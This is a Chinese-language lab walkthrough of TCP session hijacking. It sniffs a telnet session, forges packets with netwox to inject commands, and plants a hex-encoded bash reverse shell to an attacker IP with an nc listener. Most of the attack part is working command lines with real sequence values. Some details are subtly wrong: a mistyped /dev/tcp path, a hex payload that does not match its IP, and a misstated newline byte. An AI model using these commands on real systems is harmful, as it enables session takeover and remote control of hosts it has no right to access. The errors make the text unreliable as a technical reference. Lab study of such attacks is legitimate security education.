TCP劫持攻擊
攻擊思路
1、hacker獲取client與server的tcp會話包(通過arp毒化,mac泛洪攻擊等);
2、觀察server給client主機發送的tcp報文,以獲取client將要給server發送的下一個報文信息;
3、hacker通過工具僞造一個tcp報文,發送給server,其內容信息通過步驟2中獲取的報文來確定。
需要的大致報文信息:
(1)二層的source-mac是hacker機
(2)三層的源IP是client的ip,目標IP是server的ip
(3)四層的參數則是需要通過步驟2獲取
注意:server判斷會話只能通過三層與四層的信息
接下來我們搭建一個實驗來實現TCP劫持攻擊操作:
實驗拓撲
設備說明
這裏的A、B我們使用紅帽linux來模擬,C則用kali虛擬機來模擬。
攻擊步驟
一、被攻擊者A telnet 服務器B
首先被攻擊者A先去telnet服務端B,成功後,再輸入“ls”的命令,查看B當前路徑下的文件
二、抓取telnet流量
之後再在攻擊者C使Wireshark抓取Telnet流量。
首先看到最下面的一個數據包,這個是服務器B給被攻擊主機A發的最後一個數據包:
從這個數據包中我們可以看到一些信息:源目IP地址、源目端口號、下一個想要的序列號27303572431、ack確認號733859712、Flags標記(PSH、ACK)。
這裏需要注意一點:
如果看到序列號和ACK確認號是一個很小的值,則需要進行如下操作:
將圖中②的√去掉
三、然後進入kali虛擬機開始僞造TCP報文
輸入netwox,使用netwox工具僞造報文:
以下爲netwox工具中TCP的欺騙包的路徑,序號爲40:
kali@kali:~/Desktop$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): d
########################### TCP ############################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + TCP spoof
b + TCP client
c + TCP server
d + network audit using TCP
e + dns
f + ftp
g + http
h + ident
i + irc
j + nntp
k + smb
l + smtp
m + telnet
n + whois
Select a node (key in 0123456abcdefghijklmn): a
######################## TCP spoof #########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 36:Spoof EthernetIp4Tcp packet
b - 40:Spoof Ip4Tcp packet
c - 42:Spoof of packet samples : fragment
d - 43:Spoof of packet samples : fragment, ip4opt:noop
e - 44:Spoof of packet samples : fragment, ip4opt:rr
f - 45:Spoof of packet samples : fragment, ip4opt:lsrr
g - 46:Spoof of packet samples : fragment, ip4opt:ts
h - 47:Spoof of packet samples : fragment, ip4opt:ipts
i - 48:Spoof of packet samples : fragment, ip4opt:ippts
j - 142:Spoof EthernetIp6Tcp packet
k - 146:Spoof Ip6Tcp packet
l - 192:Spoof of packet samples : fragment, ip4opt:ssrr
Select a node (key in 0123456abcdefghijkl): b
################# help for tool number 40 ##################
Title: Spoof Ip4Tcp packet
+------------------------------------------------------------------------+
| This tool sends a fake packet on the network. |
| Each parameter name should be self explaining. |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to spoof. |
+------------------------------------------------------------------------+
Synonyms: hping, send
Usage: netwox 40 [-c uint32] [-e uint32] [-f|+f] [-g|+g] [-h|+h] [-i uint32] [-j uint32] [-k uint32] [-l ip] [-m ip] [-n ip4opts] [-o port] [-p port] [-q uint32] [-r uint32] [-s|+s] [-t|+t] [-u|+u] [-v|+v] [-w|+w] [-x|+x] [-y|+y] [-z|+z] [-A|+A] [-B|+B] [-C|+C] [-D|+D] [-E uint32] [-F uint32] [-G tcpopts] [-H mixed_data] [-a spoofip] [-J uint32] [-K uint32] [-L uint32] [-M uint32] [-N uint32]
Parameters:
-c|--ip4-tos uint32 IP4 tos {0}
-e|--ip4-id uint32 IP4 id (rand if unset) {0}
-f|--ip4-reserved|+f|--no-ip4-reserved IP4 reserved
-g|--ip4-dontfrag|+g|--no-ip4-dontfrag IP4 dontfrag
-h|--ip4-morefrag|+h|--no-ip4-morefrag IP4 morefrag
-i|--ip4-offsetfrag uint32 IP4 offsetfrag {0}
-j|--ip4-ttl uint32 IP4 ttl {0}
-k|--ip4-protocol uint32 IP4 protocol {0}
-l|--ip4-src ip IP4 src {192.168.248.129}
-m|--ip4-dst ip IP4 dst {5.6.7.8}
-n|--ip4-opt ip4opts IPv4 options
-o|--tcp-src port TCP src {1234}
-p|--tcp-dst port TCP dst {80}
-q|--tcp-seqnum uint32 TCP seqnum (rand if unset) {0}
-r|--tcp-acknum uint32 TCP acknum {0}
-s|--tcp-reserved1|+s|--no-tcp-reserved1 TCP reserved1
-t|--tcp-reserved2|+t|--no-tcp-reserved2 TCP reserved2
-u|--tcp-reserved3|+u|--no-tcp-reserved3 TCP reserved3
-v|--tcp-reserved4|+v|--no-tcp-reserved4 TCP reserved4
-w|--tcp-cwr|+w|--no-tcp-cwr TCP cwr
-x|--tcp-ece|+x|--no-tcp-ece TCP ece
-y|--tcp-urg|+y|--no-tcp-urg TCP urg
-z|--tcp-ack|+z|--no-tcp-ack TCP ack
-A|--tcp-psh|+A|--no-tcp-psh TCP psh
-B|--tcp-rst|+B|--no-tcp-rst TCP rst
-C|--tcp-syn|+C|--no-tcp-syn TCP syn
-D|--tcp-fin|+D|--no-tcp-fin TCP fin
-E|--tcp-window uint32 TCP window {0}
-F|--tcp-urgptr uint32 TCP urgptr {0}
-G|--tcp-opt tcpopts TCP options
-H|--tcp-data mixed_data mixed data
-a|--spoofip spoofip IP spoof initialization type {best}
-J|--ip4-ihl uint32 IP4 ihl {5}
-K|--ip4-totlen uint32 IP4 totlen {0}
-L|--ip4-checksum uint32 IP4 checksum {0}
-M|--tcp-doff uint32 TCP data offset {0}
-N|--tcp-checksum uint32 TCP checksum {0}
Example: netwox 40
Press 'r' or 'k' to run this tool, or any other key to continue
命令操作
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.248.127
–ip4-dst 192.168.248.128 --tcp-src 54325 --tcp-dst 23 --tcp-seqnum 733859712 --tcp-acknum 2730357243 --tcp-ack --tcp-psh --tcp-window 235 --tcp-data 6c730d0a
操作指令中–tcp-data參數是由以下三個數據包所決定的:
(1)Server給client回覆的第一個數據包:
(2)Server給client回覆的第二個數據包:
(3)Server給client回覆的第三個數據包:
這三個數據包所發送的數據轉換爲十六進制則是6c730d0a
輸入命令後:
這樣就僞造了一個tcp報文,發送給了server。
而現在再在被攻擊主機A上查看,發現telnet界面處在卡住狀態
這時攻擊也就是成功了,攻擊者C成功劫持了該TCP會話,導致A與B無法繼續通信。
以上是TCP劫持的基礎攻擊,下面我們先介紹以下反彈shell的原理以及利用tcp劫持來實現反彈shell的攻擊
反彈shell注入
原理
操作指令
hacker:nc -lp 8888 -vvv
數據server:bash -i>&/dev/tcp1/192.168.249.131/8888 0>&1
說明:
nc是一個小工具,指令表示用來監聽8888端口並將結果實時顯示出來;
效果:
在hacker機上先監聽8888端口,然後再在數據server上輸入上述shell腳本,則會在hacker機上自動登錄到數據server上。
劫持成功界面和TCP劫持實現反彈shell效果一樣。
利用tcp劫持來實現反彈shell
攻擊代碼
bash -i>&/dev/tcp/192.168.248.129/8888 0>&1
文本轉換爲十六進制:
62617368202d693e262f6465762f7463702f3139322e3136382e3234392e3132392f3838383820303e2631200d00
//攻擊代碼轉換後的16機制值,0d00是後添加的,0d \r 爲回到首行 00 是\n 爲換行
攻擊步驟及指令
還是和前面TCP劫持攻擊一樣:
- 先抓取TCP報文,然後僞造一個TCP報文並攜帶反彈shell腳本發送給被攻擊者,實現hacker登錄到被攻擊者,可以進行操作控制被攻擊者。
- 在攻擊者機開啓兩個終端窗口,一個用來監聽8888端口,一個用來僞造TCP報文。
攻擊者機終端窗口1指令:
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.248.127 --ip4-dst 192.168.248.128 --tcp-src 54327 --tcp-dst 23 --tcp-seqnum 164306404 --tcp-acknum 3490891661 --tcp-ack --tcp-psh --tcp-window 235 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e3234382e3132392f3838383820303e26310d00
攻擊者終端窗口2指令:
nc -lp 8888 -vvv
效果:
僞造的TCP報文(終端窗口1):
終端窗口2:
如上圖基於已經侵入到被攻擊者機中了,可以進行ls查看操作。
拓展
TCP劫持攻擊最終都會導致被攻擊者已連接的TCP連接一直處在斷開狀態(被攻擊者無法進行操作,卡住狀態),但是一旦當攻擊者終止攻擊,連接又會自動連接上(被攻擊者又可以進行操作)。